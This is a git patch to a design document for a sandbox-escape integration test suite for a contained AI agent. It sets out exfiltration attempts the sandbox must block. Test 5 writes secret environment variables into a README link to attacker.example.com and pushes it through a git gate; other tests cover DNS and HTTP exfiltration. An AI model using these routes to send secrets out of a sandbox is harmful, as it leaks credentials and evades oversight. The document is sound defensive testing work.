From 1111ced04ddfbbcfb6df43b70bc3e642be5a60f9 Mon Sep 17 00:00:00 2001
From: didericis
Date: Tue, 26 May 2026 22:11:32 -0400
Subject: [PATCH] docs(prd-0022): resolve remaining open Qs

All seven open questions now have decisions baked in:

- Q1 (HTTP-exfil scope): authoritative. Every shape MUST block;
  chunk 3 expands into remediation sub-PRDs if any of
  path/query/header leak today.
- Q3 (fake secret): multiple shapes, parameterized. Three env
  vars (TEST_SECRET_ANTHROPIC, _AWS, _GENERIC); test 5 loops
  via subTest. Resilient to gitleaks rule renames.
- Q6 (missing backend): die. `get_bottle_backend()`'s current
  behavior surfaces clearly; surprise-skips are worse than loud
  failures for new-backend branches.
- Q7 (tool deps): preflight check. setUpClass runs
  `which curl && which git && which dig`; SkipTest with the
  missing list catches future backends shipping thinner base
  images.

Updated implementation chunks + test-5 sketch to match. No
remaining open questions.
---
 .../0022-sandbox-escape-integration-test.md | 238 ++++++++++--------
 1 file changed, 128 insertions(+), 110 deletions(-)

diff --git a/docs/prds/0022-sandbox-escape-integration-test.md b/docs/prds/0022-sandbox-escape-integration-test.md
index 591339e..6aa39b4 100644
--- a/docs/prds/0022-sandbox-escape-integration-test.md
+++ b/docs/prds/0022-sandbox-escape-integration-test.md
@@ -136,10 +136,13 @@ destination outside the bottle.
   - The bottle declares: a few allowlisted egress routes
     (api.anthropic.com, etc.), a git-gate upstream pointing at
     a throwaway repo, supervise off (not under test)
-  - Plants a known `TEST_SECRET` value in the bottle's env.
-    The value matches a gitleaks rule (e.g., shaped like an
-    Anthropic API key) so the README test fires the right
-    pre-receive rejection.
+  - Plants three known secret env vars (matching three
+    gitleaks rules — anthropic-api-key, AWS, generic
+    high-entropy) so test 5 parameterizes over shapes.
+- A `setUpClass` preflight that verifies `curl`, `git`,
+  `dig` exist in the agent container; raises
+  `unittest.SkipTest` listing missing tools if any are
+  absent (catches future backends with thinner images).
 - A `_run_in_agent(script)` helper that wraps
   `bottle.exec(script)` and returns an `ExecResult`.
 - Assertions per category that read the existing
@@ -303,87 +306,130 @@ def test_4_dns_exfil_blocked(self):
     self.assertNotIn("ANSWER SECTION", result.stdout)
 ```

-### Attack-5: secret in README push (with ordering check)
+### Attack-5: secret in README push (multi-shape, with ordering check)
+
+Parameterized over three secret shapes so a renamed
+gitleaks rule doesn't silently let one shape through.

 ```python
+SECRET_SHAPES = [
+    ("anthropic", "$TEST_SECRET_ANTHROPIC"),
+    ("aws", "$TEST_SECRET_AWS"),
+    ("generic", "$TEST_SECRET_GENERIC"),
+]
+
 def test_5_readme_push_blocked(self):
-    result = self.bottle.exec(
-        'cd /tmp && git init test-repo && cd test-repo && '
-        'git config user.email "test@example.com" && '
-        'git config user.name "test" && '
-        'echo "[click](https://attacker.example.com/?leak=$TEST_SECRET)" > README.md && '
-        'git add . && git commit -m "leak" && '
-        'git remote add origin '
-        'git://claude-bottle-git-gate-/throwaway.git && '
-        'git push origin master'
-    )
-    self.assertNotEqual(0, result.returncode)
-    combined = (result.stderr + result.stdout).lower()
-    # gitleaks ran and rejected.
-    self.assertIn("gitleaks", combined)
-    # AND: the rejection happened BEFORE git-gate tried to
-    # forward to the unreachable upstream. Network errors
-    # mentioning resolve / refused / unreachable would mean
-    # gitleaks ran AFTER (sequence wrong) or didn't run.
-    for upstream_phrase in (
-        "could not resolve",
-        "connection refused",
-        "network is unreachable",
-        "upstream",
-    ):
-        self.assertNotIn(
-            upstream_phrase, combined,
-            f"unexpected upstream-phase phrase: gitleaks should "
-            f"reject BEFORE git-gate attempts an upstream push",
-        )
+    for name, env_ref in SECRET_SHAPES:
+        with self.subTest(secret=name):
+            result = self.bottle.exec(
+                'cd /tmp && rm -rf test-repo && '
+                'git init test-repo && cd test-repo && '
+                'git config user.email "test@example.com" && '
+                'git config user.name "test" && '
+                f'echo "[click](https://attacker.example.com/?leak={env_ref})" > README.md && '
+                'git add . && git commit -m "leak" && '
+                'git remote add origin '
+                'git://claude-bottle-git-gate-/throwaway.git && '
+                'git push origin master'
+            )
+            self.assertNotEqual(0, result.returncode)
+            combined = (result.stderr + result.stdout).lower()
+            # gitleaks ran and rejected.
+            self.assertIn("gitleaks", combined)
+            # AND: rejection BEFORE the unreachable upstream
+            # was contacted — network-phase errors would
+            # mean gitleaks ran late or not at all.
+            for upstream_phrase in (
+                "could not resolve",
+                "connection refused",
+                "network is unreachable",
+                "upstream",
+            ):
+                self.assertNotIn(
+                    upstream_phrase, combined,
+                    f"unexpected upstream-phase phrase for {name!r}: "
+                    f"gitleaks should reject BEFORE git-gate "
+                    f"attempts an upstream push",
+                )
 ```

 The `` is templated via the bottle's known identity at
-fixture-time. The two-part assertion both confirms gitleaks
-fired AND that it fired before any upstream attempt — the
-ordering the sandbox depends on.
+fixture-time. Each subTest independently:
+  - Confirms the rejection happened (returncode != 0)
+  - Confirms gitleaks fired (`"gitleaks"` in output)
+  - Confirms gitleaks fired BEFORE the upstream attempt
+    (no network-phase phrases in output)

 ## Implementation chunks

 Sized small.

-1. **Fixture manifest + secret env-var plumbing.** Just the
-   files under `tests/integration/fixtures/sandbox-escape/`
-   and the test class scaffolding with `setUpClass` /
-   `tearDownClass` bringing up + tearing down the bottle.
+1. **Fixture + scaffolding.** Files under
+   `tests/integration/fixtures/sandbox-escape/`, the
+   TestSandboxEscape class with `setUpClass` /
+   `tearDownClass`, the three-secret env-var fixture
+   (anthropic / AWS / generic shapes), and the
+   `setUpClass` preflight that checks for `curl`, `git`,
+   `dig` in the agent and SkipTests with the missing list.
    No attack tests yet.
-2. **Attack 1 + 2 (hostname + IP).** The simplest two —
-   curl returns non-zero, that's the assertion.
-3. **Attack 3 (HTTP exfil shapes).** Parameterized over the
-   four shapes via subTest. Likely surfaces gaps in current
-   DLP coverage for header / path / query shapes.
-4. **Attack 4 (DNS exfil).** Exact-match-allowlist
-   verification.
-5. **Attack 5 (README push via git-gate).** Hardest because
-   it requires the git-gate sidecar configured and the
-   gitleaks rule fired. The "throwaway" upstream URL is
-   intentionally unreachable to keep the test fully
-   self-contained. Ordering assertions confirm gitleaks
-   fires before any upstream push attempt.
+2. **Attack 1 + 2 (hostname + IP).** Curl exit-code
+   assertions. Also covers the host-header spoof via
+   `curl --resolve`.
+3. **Attack 3 (HTTP exfil shapes).** Parameterized over
+   the four shapes (path, query, body, header) via
+   subTest. **This chunk is authoritative** — if any shape
+   leaks today, the chunk expands to include the
+   remediation PRD work for that shape before merging.
+   May fan out into multiple sub-PRs (one per leaking
+   shape) coordinated as a chunk-3 epic.
+4. **Attack 4 (DNS exfil).** Two sub-assertions:
+   crafted-subdomain-via-pipelock + direct
+   `dig @8.8.8.8` from the agent's `--internal` network.
+5. **Attack 5 (README push via git-gate).** Hardest
+   because of the multi-secret-shape parameterization +
+   git-gate-must-be-up requirement + the gitleaks-ordering
+   assertions. The "throwaway" upstream URL is
+   intentionally unreachable.
 6. **CI integration (best-effort).** Add a Gitea Actions
    job that runs the suite against the Docker backend.
-   Marked `continue-on-error: true` so the workflow doesn't
-   fail if docker-in-docker constraints prevent compose-up.
-   If the runner shape evolves later (e.g., privileged
-   Docker socket access) the suite slots in cleanly.
+   Marked `continue-on-error: true` so the workflow
+   doesn't fail if docker-in-docker constraints prevent
+   compose-up. If the runner shape evolves later
+   (privileged Docker socket access) the suite slots in
+   cleanly.

 ## Resolved questions

+1. **Pipelock DLP coverage for non-body shapes.** Resolved:
+   **authoritative.** Every HTTP-exfil shape (path / query /
+   body / header) MUST block for the suite to pass. If a
+   shape leaks today, it's a real sandbox gap and the
+   remediation lands BEFORE this test merges, not after.
+   The project's purpose is sandbox integrity; shipping a
+   test that documents "we knowingly leak headers" is
+   worse than not shipping the test. May expand the
+   delivery into "this test PRD + N remediation PRDs"
+   depending on what attack 3 surfaces.
+
 2. **DNS exfil via the agent's direct DNS resolver.**
    Resolved: **add the assertion to test 4.** The
    `--internal` network has no default gateway, so a direct
    `dig @8.8.8.8 .example.com` from the agent
-   should fail. Test 4 grows a second assertion: in
-   addition to the crafted-subdomain-via-pipelock attempt
-   (which pipelock's exact-match allowlist rejects), the
-   agent's direct DNS query is also blocked. Both
-   sub-assertions must pass for test 4 to be green.
+   should fail. Test 4 grows a second sub-assertion
+   alongside the crafted-subdomain-via-pipelock check.
+
+3. **Realistic fake secret.** Resolved: **multiple
+   shapes, parameterized.** The README attack (test 5)
+   loops over a tuple of secret shapes — anthropic-api-key,
+   AWS key (AKIA...), and a generic high-entropy string —
+   running the push-attempt N times. Each iteration is a
+   subTest. Catches the case where one gitleaks rule
+   lapses but another still fires; also makes the test
+   resilient to rule renames. The fixture bottle's env
+   carries `TEST_SECRET_ANTHROPIC` / `TEST_SECRET_AWS` /
+   `TEST_SECRET_GENERIC` rather than one combined
+   `TEST_SECRET`.

 4. **Reachability of throwaway git upstream + gitleaks
    ordering.** Resolved: **add ordering assertions to
    test 5.**
@@ -397,61 +443,33 @@ Sized small.
    `"network is unreachable"`, or `"upstream"` — those
    would mean gitleaks let the push through and the
    failure happened later in the chain.
-   The second assertion is the "ordering" check — if it
-   fires, gitleaks ran AFTER the upstream attempt
-   (sequence is wrong) or didn't run at all.

 5. **CI vs. local-only.** Resolved: **attempt CI; accept
    local-only fallback if docker-in-docker blocks it.**
-   The Gitea Actions runner ecosystem usually has Docker
-   available to the workflow but not nested Docker
-   compose inside a containerized runner. v1 tries: add a
-   CI job that runs the suite against the Docker backend
-   on a runner with Docker socket access. If the
-   compose-up step fails because of DiD constraints, the
+   Add a Gitea Actions job that runs the suite against the
+   Docker backend on a runner with Docker socket access.
+   If compose-up fails because of DiD constraints, the
    job is marked `continue-on-error: true` and the suite
    stays local-only until we have a runner shape that can
    host it.

-## Open questions
+6. **Backend-agnostic invocation when backend missing.**
+   Resolved: **die (current behavior).** `get_bottle_backend()`
+   already dies with a clear message naming the unknown
+   backend; the test surfaces that as a hard error
+   rather than a skip. Forces the developer to set
+   `CLAUDE_BOTTLE_BACKEND` to a real implementation —
+   surprise-skips on smolmachines branches that forgot to
+   set the env var are worse than a loud failure.

-1. **What does today's pipelock actually do for shapes 3.1,
-   3.2, 3.4?** DLP body-scanning is a known feature; URL /
-   path / header scanning is less clear. The test will tell
-   us — if a shape passes today (attack succeeds), it's a
-   real gap and the test fails LOUDLY rather than silently
-   passing. Either:
-   - Treat the test as authoritative: every shape MUST block
-     for the suite to pass. Failing shapes are real bugs.
-   - Treat the test as descriptive: mark the failing shapes
-     `expectedFailure` and resolve them in a follow-up PRD.
-
-   Lean toward the first — the project's purpose is sandbox
-   integrity; documenting "we knowingly leak headers" is
-   worse than fixing it. But for v1 of this test it's OK to
-   land with `expectedFailure` markers + tickets.
-
-3. **Realistic fake secret.** `sk-ant-api03-...` shape is
-   what gitleaks's anthropic-api-key rule matches. Verify
-   the exact regex before settling on the fixture value;
-   wrong-shape secret would mean attack 5 silently passes
-   the wrong way (gitleaks doesn't fire, README ships).
-
-6. **Backend-agnostic invocation.** The suite reads
-   `CLAUDE_BOTTLE_BACKEND` so it runs against whatever
-   backend is active. For the smolmachines spike, the
-   developer sets that env var + runs the same test file.
-   No code change needed in the suite itself. Worth
-   verifying the existing `get_bottle_backend()` machinery
-   handles the backend-not-yet-implemented case gracefully
-   (it dies with a clear message today — confirm that's
-   what we want).
-
-7. **Test environment requirements.** The agent container
-   needs `curl`, `git`, `dig`. Already in today's Docker
-   image; need to declare these as required for any
-   future backend's base image too. Worth noting in the
-   smolmachines PRD.
+7. **Test environment requirements: enforce via preflight.**
+   Resolved: **preflight check in `setUpClass`.** After
+   bringing the bottle up, run `which curl && which git
+   && which dig` inside the agent container; if any tool
+   is missing, raise `unittest.SkipTest` with the missing
+   list. Catches a future backend that ships a thinner
+   base image without producing five confusing
+   command-not-found failures down the suite.

 ## References